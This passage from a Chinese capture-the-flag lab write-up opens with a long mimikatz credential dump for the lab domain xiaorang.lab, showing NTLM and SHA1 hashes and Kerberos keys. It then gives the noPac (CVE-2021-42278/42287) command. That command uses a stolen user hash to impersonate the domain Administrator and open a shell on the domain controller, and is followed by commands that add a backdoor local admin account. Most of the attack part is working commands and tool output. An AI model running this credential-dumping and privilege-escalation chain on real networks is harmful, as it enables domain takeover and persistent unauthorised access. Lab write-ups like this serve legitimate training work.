Logon Server      : (null)
Logon Time        : 2023/10/5 10:56:56
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * NTLM     : e4cee3293db1e3a139afc53875baf653
         * SHA1     : f78708e13d52b37483b58b1e3896d10bb3997315
        tspkg :
        wdigest :
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-LCM3AE8B$
         * Domain   : xiaorang.lab
         * Password : 6b 48 04 3e 10 8b c7 75 4f b1 48 eb a9 c7 22 49 61 94 02 ed 29 da 01 63 27 f4 74 f3 ed 1c ec 6d c6 43 64 b6 8f 8d 8a 73 f3 99 2e 90 1b cd fa 8f d8 77 af 0c 3f 7c a8 3d 08 c6 1a a3 6c ce a1 7e a1 f0 f1 0d 68 39 4b 49 34 ed 29 d6 a9 49 2b da 20 7f 9f d3 ce 6c fe 0c 00 1d 4d f3 0f e9 8d a7 bc 80 a6 a3 84 92 9c 83 c8 24 78 3f b0 5d 17 75 9f de 29 76 02 16 d6 01 d6 93 a9 8f 32 9f 14 7d b2 69 b5 47 78 26 9a 5d 6d 4d 49 f7 38 91 16 9b e5 00 bd bc 6b 28 07 6c 54 71 e2 2f 4d 28 d7 98 8d d7 2c 60 36 de 81 1b 27 1e c0 1e 71 96 51 66 44 5c 20 03 52 ca aa c7 ff ef 11 96 87 c6 a8 ca 72 19 04 35 96 ba 0f ec 04 b9 ec 10 1d 0f 45 77 e8 30 b0 2e e2 cc bd ff 35 8d f9 30 63 86 0b 13 a4 ef 74 f7 33 ce c8 f3 8a f4 9f 2f 1b b4 85 65
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 741315 (00000000:000b4fc3)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/10/5 10:56:56
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * NTLM     : e4cee3293db1e3a139afc53875baf653
         * SHA1     : f78708e13d52b37483b58b1e3896d10bb3997315
        tspkg :
        wdigest :
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-LCM3AE8B$
         * Domain   : xiaorang.lab
         * Password : 6b 48 04 3e 10 8b c7 75 4f b1 48 eb a9 c7 22 49 61 94 02 ed 29 da 01 63 27 f4 74 f3 ed 1c ec 6d c6 43 64 b6 8f 8d 8a 73 f3 99 2e 90 1b cd fa 8f d8 77 af 0c 3f 7c a8 3d 08 c6 1a a3 6c ce a1 7e a1 f0 f1 0d 68 39 4b 49 34 ed 29 d6 a9 49 2b da 20 7f 9f d3 ce 6c fe 0c 00 1d 4d f3 0f e9 8d a7 bc 80 a6 a3 84 92 9c 83 c8 24 78 3f b0 5d 17 75 9f de 29 76 02 16 d6 01 d6 93 a9 8f 32 9f 14 7d b2 69 b5 47 78 26 9a 5d 6d 4d 49 f7 38 91 16 9b e5 00 bd bc 6b 28 07 6c 54 71 e2 2f 4d 28 d7 98 8d d7 2c 60 36 de 81 1b 27 1e c0 1e 71 96 51 66 44 5c 20 03 52 ca aa c7 ff ef 11 96 87 c6 a8 ca 72 19 04 35 96 ba 0f ec 04 b9 ec 10 1d 0f 45 77 e8 30 b0 2e e2 cc bd ff 35 8d f9 30 63 86 0b 13 a4 ef 74 f7 33 ce c8 f3 8a f4 9f 2f 1b b4 85 65
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/10/5 10:53:55
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 59507 (00000000:0000e873)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 10:53:54
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * NTLM     : f87bbea221c346a6578b5e937f207038
         * SHA1     : 318380b6fdd4556d540909a5c86a1bf191b2f0f5
        tspkg :
        wdigest :
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-LCM3AE8B$
         * Domain   : xiaorang.lab
         * Password : 7e 84 db cc ca 73 03 80 f7 29 81 e8 9a fe 5f f1 22 35 25 bb 96 3a 28 f5 3e e9 e7 09 9f 36 a4 11 b1 77 de a6 77 48 92 8b 49 49 c2 e8 02 16 89 fb 33 bd b5 2a f7 04 62 74 db 1e c3 ba bd 63 f8 b0 d1 ec 46 50 4e 04 38 6d a7 a4 7e 0d 1a 4d 06 5a 73 6e 11 71 11 e2 7f 9b 8e 7f 68 6a 8f 23 6e 38 66 a5 76 95 65 1d 1a 38 24 fc 64 e2 ca 83 c4 87 57 ec 28 eb fe 15 50 c1 55 b2 22 46 1a 2d 7b 50 d0 71 b5 90 86 90 da 4b a8 51 2a 85 9b 38 e0 0f ea 2a 67 18 3c 8d f4 5e 3a 50 2b 57 b3 55 c5 b6 48 5a af 8c 3c f6 f4 09 0e f4 d9 ff f3 3d a2 f7 87 eb 33 02 d3 f9 d1 da b7 ac 37 14 0a 50 cc 3b ca d1 6f 0a c2 a0 73 81 75 65 91 85 95 dd 60 c6 a9 e1 1f 43 9c 4c 81 91 b5 77 ed 2d 28 5d c8 0f 1a 06 c8 89 44 64 65 11 f2 36 37 13 7c ef 8b 56
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 59477 (00000000:0000e855)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 10:53:54
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * NTLM     : e4cee3293db1e3a139afc53875baf653
         * SHA1     : f78708e13d52b37483b58b1e3896d10bb3997315
        tspkg :
        wdigest :
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-LCM3AE8B$
         * Domain   : xiaorang.lab
         * Password : 6b 48 04 3e 10 8b c7 75 4f b1 48 eb a9 c7 22 49 61 94 02 ed 29 da 01 63 27 f4 74 f3 ed 1c ec 6d c6 43 64 b6 8f 8d 8a 73 f3 99 2e 90 1b cd fa 8f d8 77 af 0c 3f 7c a8 3d 08 c6 1a a3 6c ce a1 7e a1 f0 f1 0d 68 39 4b 49 34 ed 29 d6 a9 49 2b da 20 7f 9f d3 ce 6c fe 0c 00 1d 4d f3 0f e9 8d a7 bc 80 a6 a3 84 92 9c 83 c8 24 78 3f b0 5d 17 75 9f de 29 76 02 16 d6 01 d6 93 a9 8f 32 9f 14 7d b2 69 b5 47 78 26 9a 5d 6d 4d 49 f7 38 91 16 9b e5 00 bd bc 6b 28 07 6c 54 71 e2 2f 4d 28 d7 98 8d d7 2c 60 36 de 81 1b 27 1e c0 1e 71 96 51 66 44 5c 20 03 52 ca aa c7 ff ef 11 96 87 c6 a8 ca 72 19 04 35 96 ba 0f ec 04 b9 ec 10 1d 0f 45 77 e8 30 b0 2e e2 cc bd ff 35 8d f9 30 63 86 0b 13 a4 ef 74 f7 33 ce c8 f3 8a f4 9f 2f 1b b4 85 65
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XR-LCM3AE8B$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/10/5 10:53:54
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * NTLM     : e4cee3293db1e3a139afc53875baf653
         * SHA1     : f78708e13d52b37483b58b1e3896d10bb3997315
        tspkg :
        wdigest :
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-lcm3ae8b$
         * Domain   : XIAORANG.LAB
         * Password : 6b 48 04 3e 10 8b c7 75 4f b1 48 eb a9 c7 22 49 61 94 02 ed 29 da 01 63 27 f4 74 f3 ed 1c ec 6d c6 43 64 b6 8f 8d 8a 73 f3 99 2e 90 1b cd fa 8f d8 77 af 0c 3f 7c a8 3d 08 c6 1a a3 6c ce a1 7e a1 f0 f1 0d 68 39 4b 49 34 ed 29 d6 a9 49 2b da 20 7f 9f d3 ce 6c fe 0c 00 1d 4d f3 0f e9 8d a7 bc 80 a6 a3 84 92 9c 83 c8 24 78 3f b0 5d 17 75 9f de 29 76 02 16 d6 01 d6 93 a9 8f 32 9f 14 7d b2 69 b5 47 78 26 9a 5d 6d 4d 49 f7 38 91 16 9b e5 00 bd bc 6b 28 07 6c 54 71 e2 2f 4d 28 d7 98 8d d7 2c 60 36 de 81 1b 27 1e c0 1e 71 96 51 66 44 5c 20 03 52 ca aa c7 ff ef 11 96 87 c6 a8 ca 72 19 04 35 96 ba 0f ec 04 b9 ec 10 1d 0f 45 77 e8 30 b0 2e e2 cc bd ff 35 8d f9 30 63 86 0b 13 a4 ef 74 f7 33 ce c8 f3 8a f4 9f 2f 1b b4 85 65
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 29920 (00000000:000074e0)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/10/5 10:53:54
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * NTLM     : e4cee3293db1e3a139afc53875baf653
         * SHA1     : f78708e13d52b37483b58b1e3896d10bb3997315
        tspkg :
        wdigest :
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-LCM3AE8B$
         * Domain   : xiaorang.lab
         * Password : 6b 48 04 3e 10 8b c7 75 4f b1 48 eb a9 c7 22 49 61 94 02 ed 29 da 01 63 27 f4 74 f3 ed 1c ec 6d c6 43 64 b6 8f 8d 8a 73 f3 99 2e 90 1b cd fa 8f d8 77 af 0c 3f 7c a8 3d 08 c6 1a a3 6c ce a1 7e a1 f0 f1 0d 68 39 4b 49 34 ed 29 d6 a9 49 2b da 20 7f 9f d3 ce 6c fe 0c 00 1d 4d f3 0f e9 8d a7 bc 80 a6 a3 84 92 9c 83 c8 24 78 3f b0 5d 17 75 9f de 29 76 02 16 d6 01 d6 93 a9 8f 32 9f 14 7d b2 69 b5 47 78 26 9a 5d 6d 4d 49 f7 38 91 16 9b e5 00 bd bc 6b 28 07 6c 54 71 e2 2f 4d 28 d7 98 8d d7 2c 60 36 de 81 1b 27 1e c0 1e 71 96 51 66 44 5c 20 03 52 ca aa c7 ff ef 11 96 87 c6 a8 ca 72 19 04 35 96 ba 0f ec 04 b9 ec 10 1d 0f 45 77 e8 30 b0 2e e2 cc bd ff 35 8d f9 30 63 86 0b 13 a4 ef 74 f7 33 ce c8 f3 8a f4 9f 2f 1b b4 85 65
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 29912 (00000000:000074d8)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/10/5 10:53:54
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * NTLM     : e4cee3293db1e3a139afc53875baf653
         * SHA1     : f78708e13d52b37483b58b1e3896d10bb3997315
        tspkg :
        wdigest :
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-LCM3AE8B$
         * Domain   : xiaorang.lab
         * Password : 6b 48 04 3e 10 8b c7 75 4f b1 48 eb a9 c7 22 49 61 94 02 ed 29 da 01 63 27 f4 74 f3 ed 1c ec 6d c6 43 64 b6 8f 8d 8a 73 f3 99 2e 90 1b cd fa 8f d8 77 af 0c 3f 7c a8 3d 08 c6 1a a3 6c ce a1 7e a1 f0 f1 0d 68 39 4b 49 34 ed 29 d6 a9 49 2b da 20 7f 9f d3 ce 6c fe 0c 00 1d 4d f3 0f e9 8d a7 bc 80 a6 a3 84 92 9c 83 c8 24 78 3f b0 5d 17 75 9f de 29 76 02 16 d6 01 d6 93 a9 8f 32 9f 14 7d b2 69 b5 47 78 26 9a 5d 6d 4d 49 f7 38 91 16 9b e5 00 bd bc 6b 28 07 6c 54 71 e2 2f 4d 28 d7 98 8d d7 2c 60 36 de 81 1b 27 1e c0 1e 71 96 51 66 44 5c 20 03 52 ca aa c7 ff ef 11 96 87 c6 a8 ca 72 19 04 35 96 ba 0f ec 04 b9 ec 10 1d 0f 45 77 e8 30 b0 2e e2 cc bd ff 35 8d f9 30 63 86 0b 13 a4 ef 74 f7 33 ce c8 f3 8a f4 9f 2f 1b b4 85 65
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 27654 (00000000:00006c06)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2023/10/5 10:53:54
SID               :
        msv :
         [00000003] Primary
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * NTLM     : e4cee3293db1e3a139afc53875baf653
         * SHA1     : f78708e13d52b37483b58b1e3896d10bb3997315
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XR-LCM3AE8B$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/10/5 10:53:54
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XR-LCM3AE8B$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-lcm3ae8b$
         * Domain   : XIAORANG.LAB
         * Password : 6b 48 04 3e 10 8b c7 75 4f b1 48 eb a9 c7 22 49 61 94 02 ed 29 da 01 63 27 f4 74 f3 ed 1c ec 6d c6 43 64 b6 8f 8d 8a 73 f3 99 2e 90 1b cd fa 8f d8 77 af 0c 3f 7c a8 3d 08 c6 1a a3 6c ce a1 7e a1 f0 f1 0d 68 39 4b 49 34 ed 29 d6 a9 49 2b da 20 7f 9f d3 ce 6c fe 0c 00 1d 4d f3 0f e9 8d a7 bc 80 a6 a3 84 92 9c 83 c8 24 78 3f b0 5d 17 75 9f de 29 76 02 16 d6 01 d6 93 a9 8f 32 9f 14 7d b2 69 b5 47 78 26 9a 5d 6d 4d 49 f7 38 91 16 9b e5 00 bd bc 6b 28 07 6c 54 71 e2 2f 4d 28 d7 98 8d d7 2c 60 36 de 81 1b 27 1e c0 1e 71 96 51 66 44 5c 20 03 52 ca aa c7 ff ef 11 96 87 c6 a8 ca 72 19 04 35 96 ba 0f ec 04 b9 ec 10 1d 0f 45 77 e8 30 b0 2e e2 cc bd ff 35 8d f9 30 63 86 0b 13 a4 ef 74 f7 33 ce c8 f3 8a f4 9f 2f 1b b4 85 65
        ssp :
        credman :
        cloudap :

mimikatz #

根据题目描述考虑 noPac

只有zhanghui能成功,zhanghui在MA_Admin组,MA_Admin 组对computer 能够创建对象

Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)

proxychains python3 noPac.py xiaorang.lab/zhanghui -hashes ':1232126b24cdf8c9bd2f788a9d7c7ed1' -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell
net user test2 Abcd1234 /add
net localgroup administrators test2 /add

远程登录拿flag

image-20231005123446818

后面域那里打得很懵,还是太菜了。。